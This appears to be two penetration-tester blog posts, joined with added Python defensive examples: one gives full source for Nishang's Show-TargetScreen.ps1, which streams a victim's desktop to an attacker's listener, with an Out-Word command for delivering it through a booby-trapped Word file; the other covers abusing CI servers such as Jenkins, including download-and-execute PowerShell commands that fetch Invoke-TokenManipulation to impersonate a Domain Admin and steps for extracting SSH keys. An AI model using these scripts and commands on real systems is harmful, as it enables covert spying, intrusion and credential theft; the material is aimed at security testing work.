Recently, I have been working on an interesting concept. I wanted to use MJPEG to stream images in real time from a target desktop to be able to see the activity of a target user. I literally spent weeks getting it working, but in the end it turned out that a small piece of PowerShell code could be used to achieve this. Anyway, I give you <b>Show-TargetScreen.ps1</b>. This script can stream a target's desktop in real time and the stream can be seen in browsers which support MJPEG (Firefox).<br />
<br />
<a href="https://github.com/samratashok/nishang/blob/master/Gather/Show-TargetScreen.ps1">Show-TargetScreen is available in the Gather category of Nishang</a>. The current source code looks like this:</div>
<div style="text-align: justify;">
<br />
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: white; color: black;">function Show-TargetScreen
{
<#
.SYNOPSIS
Nishang script which can be used for streaming a target's desktop using MJPEG.

.DESCRIPTION
This script uses MJPEG to stream a target's desktop in real time. It is able to connect to a standard netcat listening
on a port when using the -Reverse switch. Also, a standard netcat can connect to this script when it is bound to a
specific port using the -Bind switch. A netcat listener which relays the connection to a local port could be used as
the listener. A browser which supports MJPEG (Firefox) should then be pointed to the local port to see the remote desktop.
The script should be used with Client Side Attacks.

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443
Above shows an example of a reverse connection. A netcat/powercat listener must be listening on
the given IP and port.

.EXAMPLE
PS > Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"
Above shows an example using the script in a client side attack.

.EXAMPLE
PS > Show-TargetScreen -Bind -Port 1234
Above shows an example of bind mode. Point Firefox to the IPAddress of the target and given port to see user's Desktop.

.LINK
http://www.labofapenetrationtester.com/2015/12/stream-targets-desktop-using-mjpeg-and-powershell.html
https://github.com/samratashok/nishang
#>
    [CmdletBinding(DefaultParameterSetName="reverse")]
    Param(
        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
        [String]
        $IPAddress,

        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
        [Int]
        $Port,

        [Parameter(ParameterSetName="reverse")]
        [Switch]
        $Reverse,

        [Parameter(ParameterSetName="bind")]
        [Switch]
        $Bind
    )

    while ($true)
    {
        try
        {
            # System.Windows.Forms is needed for Screen, System.Drawing for Bitmap/Graphics.
            Add-Type -AssemblyName System.Windows.Forms
            Add-Type -AssemblyName System.Drawing
            [System.IO.MemoryStream] $MemoryStream = New-Object System.IO.MemoryStream

            if ($Bind)
            {
                # Bind to the provided port and wait for the viewer to connect.
                $endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, $Port)
                $server = New-Object System.Net.Sockets.TcpListener $endpoint
                $server.Start()
                $socket = $server.AcceptSocket()
            }
            else
            {
                # Connect back to the listener ("reverse" is the default parameter set).
                $socket = New-Object System.Net.Sockets.Socket ([System.Net.Sockets.AddressFamily]::InterNetwork, [System.Net.Sockets.SocketType]::Stream, [System.Net.Sockets.ProtocolType]::Tcp)
                $socket.Connect($IPAddress, $Port)
                Write-Verbose "Connected to $IPAddress"
            }

            #https://evilevelive.wordpress.com/2009/03/09/web-server-written-in-powershell/
            # Send raw bytes over the socket.
            function SendResponse($sock, [byte[]] $bytes)
            {
                if ($sock.Connected)
                {
                    $bytesSent = $sock.Send($bytes)
                    if ($bytesSent -eq -1)
                    {
                        Write-Output ("Send failed to " + $sock.RemoteEndPoint)
                    }
                }
            }

            # Send an ASCII string over the socket.
            function SendStrResponse($sock, $string)
            {
                SendResponse $sock ([Text.Encoding]::ASCII.GetBytes($string))
            }

            # Send the HTTP response header that starts the MJPEG stream. The boundary
            # declared here must match the delimiter written before every part below.
            function SendHeader([Net.Sockets.Socket] $sock, $statusCode = "200 OK")
            {
                $response = "HTTP/1.1 $statusCode`r`n" +
                            "Content-Type: multipart/x-mixed-replace; boundary=boundary`r`n`r`n"
                SendStrResponse $sock $response
                Write-Verbose "Header sent to $IPAddress"
            }

            SendHeader $socket

            while ($true)
            {
                # Capture the primary screen into a bitmap and encode it as JPEG in memory.
                $bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
                $b = New-Object System.Drawing.Bitmap($bounds.Width, $bounds.Height)
                $g = [System.Drawing.Graphics]::FromImage($b)
                $g.CopyFromScreen((New-Object System.Drawing.Point(0,0)), (New-Object System.Drawing.Point(0,0)), $b.Size)
                $g.Dispose()
                $MemoryStream.SetLength(0)
                $b.Save($MemoryStream, [System.Drawing.Imaging.ImageFormat]::Jpeg)
                $b.Dispose()
                $length = $MemoryStream.Length
                [byte[]] $Bytes = $MemoryStream.ToArray()

                # One multipart part per frame: delimiter, part headers, blank line, JPEG bytes.
                $str = "`r`n--boundary`r`n" +
                       "Content-Type: image/jpeg`r`n" +
                       "Content-Length: $length`r`n`r`n"
                SendStrResponse $socket $str
                SendResponse $socket $Bytes
            }
            $MemoryStream.Close()
        }
        catch
        {
            Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
            Write-Error $_
        }
    }
}
</textarea></pre>
<br /></div>
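<div style="text-align: justify;">
For the analyst on the receiving end of such a stream, the example below (added here, in Python, not part of Nishang) parses a captured copy of the HTTP response the script sends: it checks for the multipart/x-mixed-replace header, splits the body on the boundary, uses each part's Content-Length to cut out the JPEG bytes, and flags frames that were cut short. The sample stream it runs against is constructed inline in the same byte layout the script writes.</div>

```python
"""Recover the JPEG frames from a captured Show-TargetScreen stream.

Added example, not part of Nishang: given the raw bytes of the HTTP response
the script sends (for example carved from a packet capture of the listener
connection), confirm it is an MJPEG desktop feed and extract every screenshot
for review. It accepts the line endings the script writes (CRLF+LF after the
header, bare LF inside parts) as well as strict CRLF.
"""
import re
from dataclasses import dataclass


@dataclass
class Frame:
    index: int
    declared_length: int
    data: bytes

    @property
    def truncated(self) -> bool:
        # Fewer bytes arrived than the part's Content-Length promised (capture cut short).
        return len(self.data) < self.declared_length

    @property
    def looks_like_jpeg(self) -> bool:
        # A complete JPEG starts with the SOI marker FF D8 and ends with the EOI marker FF D9.
        return self.data[:2] == b"\xff\xd8" and self.data[-2:] == b"\xff\xd9"


_STATUS_AND_HEADERS = re.compile(rb"HTTP/1\.[01] (\d{3})[^\r\n]*\r?\n(.*?)\r?\n\r?\n", re.S)
_BOUNDARY = re.compile(rb"multipart/x-mixed-replace;\s*boundary=\"?([^\";\r\n ]+)", re.I)
_PART_HEADERS = re.compile(rb"\s*(.*?)\r?\n\r?\n", re.S)
_CONTENT_LENGTH = re.compile(rb"Content-Length:\s*(\d+)", re.I)


def parse_mjpeg_stream(raw: bytes):
    """Split a raw HTTP response into (boundary, [Frame, ...]).

    Raises ValueError if the bytes are not an HTTP response or not an MJPEG stream.
    """
    head = _STATUS_AND_HEADERS.match(raw)
    if head is None:
        raise ValueError("not an HTTP response")
    status, headers = head.group(1), head.group(2)
    if status != b"200":
        raise ValueError("unexpected status %r" % status)
    bm = _BOUNDARY.search(headers)
    if bm is None:
        raise ValueError("not a multipart/x-mixed-replace stream")
    boundary = bm.group(1)
    # RFC 2046 delimiters are '--' + boundary. The script declares the boundary as
    # '--boundary' yet writes '--boundary' (not '----boundary') before each part, so
    # normalise by stripping leading dashes before prefixing the delimiter.
    delimiter = b"--" + boundary.lstrip(b"-")

    frames = []
    for part in raw[head.end():].split(delimiter):
        if part.strip() in (b"", b"--"):  # preamble, or a closing delimiter
            continue
        pm = _PART_HEADERS.match(part)
        if pm is None:
            continue
        lm = _CONTENT_LENGTH.search(pm.group(1))
        payload = part[pm.end():]
        declared = int(lm.group(1)) if lm else len(payload.rstrip(b"\r\n"))
        frames.append(Frame(len(frames), declared, payload[:declared]))
    return boundary, frames


def build_sample_stream(jpegs):
    """Constructed fixture: lay out frames exactly the way Show-TargetScreen writes them."""
    out = b"HTTP/1.1 200 OK\r\nContent-Type: multipart/x-mixed-replace; boundary=--boundary\r\n\n"
    for data in jpegs:
        out += b"\n\n--boundary\nContent-Type: image/jpeg\nContent-Length: %d\n\n" % len(data)
        out += data
    return out


# Two tiny constructed "JPEGs": only the SOI/EOI markers are meaningful here.
SAMPLE_FRAMES = [b"\xff\xd8\xff\xe0\x00\x10JFIF\xff\xd9", b"\xff\xd8\xff\xdb\x00\x43ABC\xff\xd9"]
SAMPLE_STREAM = build_sample_stream(SAMPLE_FRAMES)


def summarize(raw: bytes) -> dict:
    """What an analyst wants first: frame count, bytes leaked, and whether every frame is intact."""
    boundary, frames = parse_mjpeg_stream(raw)
    return {
        "boundary": boundary.decode(),
        "frames": len(frames),
        "bytes": sum(len(f.data) for f in frames),
        "all_intact": all(f.looks_like_jpeg and not f.truncated for f in frames),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_STREAM))
    print(summarize(SAMPLE_STREAM[:-3]))  # a capture that ended mid-frame
```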
<div style="text-align: justify;">
Now, to use it for a reverse connection, and to avoid having to write a listener/server, I used powercat to run a local relay to which Show-TargetScreen connects, and we point Firefox to the local port. So, start a powercat listener and relay to any local port. In the command below, Show-TargetScreen will connect to port 443 and Firefox will connect to port 9000: </div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\nishang> powercat -l -v -p 443 -r tcp:9000 -rep -t 1000</textarea></pre>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Note that on a *nix machine, netcat could be used as well. <br />
<br />
Now, to be able to stream a user's Desktop, Show-TargetScreen must be used with a <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">client side attack</a>. Let's use it with Out-Word from Nishang. Since, like other Nishang scripts, Show-TargetScreen.ps1 only loads a function with the same name, we should pass the argument "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443" and use it as the payload for Out-Word. </div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">PS C:\nishang> Out-Word -PayloadURL "http://192.168.1.6/Show-TargetScreen.ps1" -Arguments "Show-TargetScreen -Reverse -IPAddress 192.168.1.6 -Port 443"</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Now, the generated doc file is to be sent to a target. As soon as a target user opens up the Word file, we will have a connect back on the powercat listener which will relay to the configured local port (TCP 9000 in this example).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPSVCqg4X1vqXoDf9emAUNxEJWmCMndPVoLxa4Rl1uPm2uJ-O3o5optK9bzSHKCpL0cuevpWGGE3jx8JrBcHokJUumkJ67uyzA_8RcYufyEbGorq2Vty-kS4Ad6VKADYJylRTyRwL17Yg/s1600/powercat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPSVCqg4X1vqXoDf9emAUNxEJWmCMndPVoLxa4Rl1uPm2uJ-O3o5optK9bzSHKCpL0cuevpWGGE3jx8JrBcHokJUumkJ67uyzA_8RcYufyEbGorq2Vty-kS4Ad6VKADYJylRTyRwL17Yg/s400/powercat.png" width="400" /></a></div>
Now if we point Firefox to http://127.0.0.1:9000, we have a live stream of the target user's Desktop. </div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp4ZM8YLPgFw94I_cn3hWwmyGFoFZO-Ud7nVIePnWJpVP0R-m-YmMAWT4EAZjWkS5RtPLrYKLsnQ5nZv9eH0JsX-OuiUU8QgzLV6-G-boOJaseClOTdC5eLHGLYD1UgGA9px6sTQdc29s/s1600/Show-TargetScreen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp4ZM8YLPgFw94I_cn3hWwmyGFoFZO-Ud7nVIePnWJpVP0R-m-YmMAWT4EAZjWkS5RtPLrYKLsnQ5nZv9eH0JsX-OuiUU8QgzLV6-G-boOJaseClOTdC5eLHGLYD1UgGA9px6sTQdc29s/s320/Show-TargetScreen.png" width="320" /></a></div>
Awesome! Isn't it? I recently tried this in a couple of pen tests and was quite satisfied with the results.<br />
<br />
A couple of things I would like to improve in the future:<br />
- Proxy support<br />
- HTTPS connection<br />
<br />
Feel free to suggest improvements and submit pull requests. Feedback and comments are welcome. </div>
<div style="text-align: justify;">
<br /></div>
</div>
Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)<br />
<br />
Week of Continuous Intrusion Tools - Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation (published 2015-12-03, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Welcome to Day 4 of Week of Continuous Intrusion tools. We are discussing security of Continuous Integration (CI) tools in this series of blog posts. </div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: left;">
Day 1 - Jenkins (and Hudson) (<a href="http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-1.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 2 - TeamCity (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-2.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 3 - Go and CruiseControl (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-3.html">Click Here</a>)</div>
<div style="text-align: left;">
Day 4 - Common Abuse Set, Lateral Movement and Post Exploitation</div>
<div style="text-align: justify;">
Day 5 - Defense and other discussion (<a href="http://www.labofapenetrationtester.com/2015/12/week-of-continuous-intrusion-tools-day-5.html">Click Here</a>)</div>
<br />
<div style="text-align: justify;">
Day 4 is dedicated to Common abuse set, Lateral movement and Post exploitation. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the past three days, we discussed how different attacks can be executed against Jenkins (and Hudson), TeamCity, (very briefly) CruiseControl and Go. Some readers might have noticed that many attacks looked common and were the result of mis-configurations, lack of common security controls and/or abuse of features. Let's pick the things common to the tools we discussed and make a Common Abuse Set out of them.</div>
<div style="text-align: justify;">
</div>
<br />
<br />
<h3 style="text-align: left;">
Common Abuse Set</h3>
From the previous posts, the Common Abuse Set for the CI Tools we saw turns out to be:<br />
<ul style="text-align: left;">
<li>Missing basic and common security controls </li>
<ul>
<li>Missing protections against brute force attempts.</li>
<li> Insecure storage of SSH keys and credentials.</li>
<li>Higher privileges on Windows machines for both master and slaves.</li>
</ul>
<li> The feature of Command Execution at the Operating System level.</li>
<li>Mis-Configuration</li>
<ul>
<li>Agent on Master</li>
<li>Read permissions to everyone on public instances.</li>
<li>Use of HTTP for login</li>
<li>Not enabling encrypted communication between master and slaves.</li>
</ul>
<li>Poor Security practices by users</li>
<ul>
<li>Passwords in build parameters.</li>
<li>Use of username as password specially in case of users local to a CI tool. </li>
</ul>
<li>Many public instances of these tools.</li>
</ul>
<div style="text-align: justify;">
Let's have a quick look at some of them.</div>
<br />
<h3 style="text-align: justify;">
(Missing) Security Controls</h3>
<br />
<div style="text-align: justify;">
<b>1. Authentication</b></div>
<br />
<div style="text-align: justify;">
CI tools were found to be missing even the most basic security controls, like protection against brute force attacks. In fact, Jenkins and Go have no authentication at all in the default installation. If you have been following this blog for the past three days, you will have seen that it is trivial to find instances of these tools on the internet running with the default configuration. This highlights the state of security for these tools. Not many enterprise tools miss these basic controls. </div>
<style type="text/css">
.tg {border-collapse:collapse;border-spacing:0;border-color:#ccc;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#ccc;color:#333;background-color:#fff;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;border-color:#ccc;color:#333;background-color:#f0f0f0;}
.tg .tg-baqh{text-align:center;vertical-align:top}
.tg .tg-yw4l{vertical-align:top}
</style><br />
<table class="tg"><tbody>
<tr> <th class="tg-baqh">CI Tool</th> <th class="tg-baqh">Jenkins/Hudson</th> <th class="tg-baqh">Teamcity</th> <th class="tg-baqh">Go</th> </tr>
<tr> <td class="tg-yw4l">Authentication<br />
- Login attempts<br />
-Captcha<br />
-Password Policy</td> <td class="tg-yw4l">- No Authentication by Default<br />
- No protection against Brute Force attacks in the recommended Matrix based Authorization<br />
- No captcha<br />
- No Password Policy (Complexity, History, Expire time etc.)</td> <td class="tg-yw4l">- Guest User can be enabled<br />
- Registration enabled by default<br />
- Wait after five failed login attempts in one minute<br />
- No captcha<br />
- No Password Policy (Complexity, History, Expire time etc.)</td> <td class="tg-yw4l">- No Authentication by Default<br />
- No protection against Brute Force attacks.<br />
- No captcha<br />
- No Password Policy (Complexity, History, Expire time etc.)</td> </tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<br />
<span style="font-weight: normal;"><b>2. Insecure Storage of Credentials/SSH Keys </b></span><br />
All of the tested CI tools store all or some credentials and SSH keys in an insecure format. All of them store SSH keys in clear text, and the encrypted credentials from Jenkins could be retrieved in clear text. It's amazing that these tools still do this.<br />
<br />
<b>3. Privileges </b></div>
<div style="text-align: justify;">
All the tested CI tools run with either SYSTEM or admin privileges on Windows. This holds true for both masters and slaves/agents. This makes the command execution access much more fruitful from an attacker's view.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Command Execution </h3>
<div style="text-align: justify;">
The feature of CI tools which allows execution of Operating System commands by adding build steps is what makes them special. In most widely used enterprise tools, the ability to execute OS commands is uncommon. This ability makes CI tools a useful target. Add to it the capability of distributed builds, and by compromising the master an attacker can execute commands on a large number of slaves.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Mis-configuration</h3>
<div style="text-align: justify;">
<b>Agent on master</b></div>
<div style="text-align: justify;">
The documentation of all the tested CI tools does not recommend having a build executor or agent on the master. Still, Jenkins installs it by default and TeamCity provides it in the same installation package. Only Go needs a user to download a separate installation for an agent on the master. We have already seen that an agent on the master makes all other security useless.</div>
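<div style="text-align: justify;">
The checks above (authentication, credential storage and an agent on the master) can be turned into a quick configuration audit. The example below is added here and is not part of Jenkins or of this series: it parses a Jenkins config.xml and credentials.xml and reports the weak settings, with a hardened config.xml beside the weak one. Both XML documents are constructed samples using the real Jenkins element names; the assumption that secrets Jenkins has encrypted appear as a {...} token is marked in the code.</div>

```python
"""Audit a Jenkins master for the Common Abuse Set items discussed above.

Added example, not part of Jenkins or of this series. It reads the two files
the posts keep coming back to, $JENKINS_HOME/config.xml (authentication and
executors on the master) and $JENKINS_HOME/credentials.xml (SSH keys and
passphrases stored in the clear), and reports every weak setting it finds.
"""
import xml.etree.ElementTree as ET

# Constructed config.xml of a default install: no authentication, two executors on the master.
WEAK_CONFIG_XML = """<hudson>
  <useSecurity>false</useSecurity>
  <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>
  <securityRealm class="hudson.security.SecurityRealm$None"/>
  <numExecutors>2</numExecutors>
</hudson>
"""

# The same file after hardening: security on, a real realm, no executors on the master.
HARDENED_CONFIG_XML = """<hudson>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy"/>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm"/>
  <numExecutors>0</numExecutors>
</hudson>
"""

# Constructed credentials.xml with one SSH credential whose key and passphrase are in the clear.
WEAK_CREDENTIALS_XML = """<com.cloudbees.plugins.credentials.SystemCredentialsProvider>
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
          <id>deploy-key</id>
          <username>deploy</username>
          <passphrase>Summer2015</passphrase>
          <privateKeySource class="com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey$DirectEntryPrivateKeySource">
            <privateKey>-----BEGIN RSA PRIVATE KEY-----
CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY
-----END RSA PRIVATE KEY-----</privateKey>
          </privateKeySource>
        </com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
"""


def _text(root, tag, default=""):
    """Text of a direct child element, or the default when it is absent."""
    node = root.find(tag)
    return (node.text or "").strip() if node is not None else default


def audit_config(config_xml):
    """Return a list of (check_id, message) findings for a config.xml document."""
    root = ET.fromstring(config_xml)
    findings = []
    if _text(root, "useSecurity").lower() != "true":
        findings.append(("no-auth", "useSecurity is not true: the UI is reachable without logging in"))
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class", "").endswith("SecurityRealm$None"):
        findings.append(("no-auth-realm", "securityRealm is SecurityRealm$None: no user database configured"))
    strategy = root.find("authorizationStrategy")
    if strategy is not None and strategy.get("class", "").endswith("AuthorizationStrategy$Unsecured"):
        findings.append(("unsecured-authz", "authorizationStrategy is Unsecured: anyone can do anything"))
    executors = int(_text(root, "numExecutors", "0") or 0)
    if executors > 0:
        findings.append(("executors-on-master",
                         "numExecutors=%d: build steps run on the master under its own account" % executors))
    return findings


def audit_credentials(credentials_xml):
    """Return findings for SSH private keys and passphrases that are readable in the clear."""
    root = ET.fromstring(credentials_xml)
    findings = []
    for node in root.iter():
        value = (node.text or "").strip()
        if node.tag == "privateKey" and "PRIVATE KEY-----" in value:
            findings.append(("cleartext-private-key", "privateKey stored as a PEM block in the clear"))
        # Assumption: a secret Jenkins has encrypted is written as a '{base64}' token,
        # so any other non-empty passphrase value is clear text.
        elif node.tag == "passphrase" and value and not (value.startswith("{") and value.endswith("}")):
            findings.append(("cleartext-passphrase", "passphrase readable in the clear"))
    return findings


if __name__ == "__main__":
    for name, findings in (("weak config.xml", audit_config(WEAK_CONFIG_XML)),
                           ("hardened config.xml", audit_config(HARDENED_CONFIG_XML)),
                           ("credentials.xml", audit_credentials(WEAK_CREDENTIALS_XML))):
        print(name, "->", [check for check, _ in findings] or "no findings")
```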
<br />
<h3 style="text-align: left;">
Lateral Movement and Post Exploitation</h3>
<div style="text-align: justify;">
The kind of access we have with CI tools makes it possible to do much more interesting stuff in a network other than just a reverse shell. </div>
<br />
<h4 style="text-align: left;">
Domain Admin</h4>
<br />
<div style="text-align: justify;">
Because the CI tools we discussed support distributed builds, in an enterprise environment it is quite possible to spot machines (master and/or slave) where the credentials of a highly privileged user like a common Local Admin or a Domain Admin are available. Note that even if the master runs on *nix, there are almost always slaves running on Windows. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Let's assume this scenario. We have access to Jenkins or any other tool and the ability to configure builds on many slaves, and one of the slaves has a process running as Domain Administrator. We can use PowerShell (and other tools as well) to enumerate and reuse the token and escalate to Domain Admin. We can use <a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1">Invoke-TokenManipulation from PowerSploit</a> for enumeration and impersonation. We can use the below command in a Jenkins build step for downloading and executing the script in memory:</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">powershell -c "iex(New-Object Net.WebClient).DownloadString('http://[IPAddress]/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation"</textarea></pre>
<div style="text-align: justify;">
Since Jenkins runs as SYSTEM, this will list all the available tokens.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RmlypvXqcYeDX_d-7AsjUkuo-wVHbE7QZb5lEXqGkSpTYdNh4gPt8c_ZU9Q03VWZo9OyEoG5hKbzu8D3_cbQoX1rKTBwtucPr4yPrXB5y7Vjf6g0n9NtR5fV6YhXqZRmzbz6CX5xl9E/s1600/Domain_Admin_Token.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7RmlypvXqcYeDX_d-7AsjUkuo-wVHbE7QZb5lEXqGkSpTYdNh4gPt8c_ZU9Q03VWZo9OyEoG5hKbzu8D3_cbQoX1rKTBwtucPr4yPrXB5y7Vjf6g0n9NtR5fV6YhXqZRmzbz6CX5xl9E/s400/Domain_Admin_Token.png" width="400" /></a></div>
Note that there is a token for the Domain Administrator. Now we can use the below command in a Jenkins build step to run Invoke-TokenManipulation in memory, impersonate the token of the Domain Administrator and run the Get-Process cmdlet on the Domain Controller.</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: white; color: black;">powershell -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.230.1/Invoke-TokenManipulation.ps1');Get-Process -Id 364 | Invoke-TokenManipulation -ImpersonateUser;Get-Process -Computername pfptlab-dc"</textarea></pre>
<div style="text-align: justify;">
And the result looks like:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8WqYrD92DEOAtnTu3LuVu9HdwiksvIlBkV2qisYHmmPX4ykiNDhtv8geNWxJqDfoqMAStBv9_NLsas60BL-lN4KEuamcUZYhxv2BklG7kHTeEkoqbLU8eIy7iIiQ1GxrcGvsRnVTmSQ/s1600/Domain_Admin_Success.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU8WqYrD92DEOAtnTu3LuVu9HdwiksvIlBkV2qisYHmmPX4ykiNDhtv8geNWxJqDfoqMAStBv9_NLsas60BL-lN4KEuamcUZYhxv2BklG7kHTeEkoqbLU8eIy7iIiQ1GxrcGvsRnVTmSQ/s400/Domain_Admin_Success.png" width="400" /></a></div>
Awesome! We just executed a command on the domain controller as a domain admin. Too easy? Try it in an environment where you are authorized to do so and get pleasantly surprised ;)</div>
<div style="text-align: justify;">
Please note that we assumed the enumeration of the names of the Domain Admins and the Domain Controller was already done (which is trivial). Also, even if we cannot find a privileged user on any of the slaves, we can always try querying other machines in the network from the slave machines we have access to ;) Note that while querying other machines in a domain we must impersonate a domain user on the slave machine to be able to interact with Active Directory. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h4>
Linux machines</h4>
</div>
<div style="text-align: justify;">
While testing the CI tools, we regularly got our hands on SSH keys. These SSH keys could be used to access version control and Linux hosts.<br />
<br />
Let's assume this scenario. We got access to a Jenkins instance. We can retrieve an SSH key and use it to log in to a Linux machine (as root or a normal user, depending on the key). As we saw in Day 1, SSH keys in Jenkins are stored in clear either in $JENKINS_HOME or in credentials.xml. We can also retrieve the passphrase. More often than not, we will be able to log in to a large number of slaves.<br />
<br />
Let's read credentials.xml and see if there are any private SSH keys there.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXpESgwYbVkbV8cGEGm0DXD3NnM793kLXGt55PLyi6qIGSTkOYq1MumUp3GvDX365Xgua4HEZM4HAXB8sZJZv_ZN-JaoOc3wNaf5LorDus0qhl09N6LQB06rYBdVMU8YWYPAE8E4uOVc/s1600/SSH_Keys.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaXpESgwYbVkbV8cGEGm0DXD3NnM793kLXGt55PLyi6qIGSTkOYq1MumUp3GvDX365Xgua4HEZM4HAXB8sZJZv_ZN-JaoOc3wNaf5LorDus0qhl09N6LQB06rYBdVMU8YWYPAE8E4uOVc/s400/SSH_Keys.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
It seems there is a private key for a user named "ubuntuadmin" which has a passphrase (encrypted). We can retrieve the passphrase using the method discussed in Day 1. Now, the only missing part is which machine the key can be used on. For that, we either need to look through the build logs for any mention of this key being used, or simply try it on all the Linux machines available.<br />
<br />
Also, to use the key with PuTTY, we need to convert it to PuTTY format using PuTTYgen.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJi_9rUbwIyOJaK7XNF-0S-UQlp0NQsRAle35UeuR7E3cS3NCP6K6XPF_P7XN1FOo_NHsw28Ga4V07cVUSFVViWq-VsjDW2j1SybgIBxgrRRqmG7Ub7L7soSiEAiESgcl3u1UUMkbWJk/s1600/SSH_Keys_PuttyGen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="313" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJi_9rUbwIyOJaK7XNF-0S-UQlp0NQsRAle35UeuR7E3cS3NCP6K6XPF_P7XN1FOo_NHsw28Ga4V07cVUSFVViWq-VsjDW2j1SybgIBxgrRRqmG7Ub7L7soSiEAiESgcl3u1UUMkbWJk/s400/SSH_Keys_PuttyGen.png" width="400" /></a></div>
And then:<br />
<div class="separator" style="clear: both; text-align: center;">
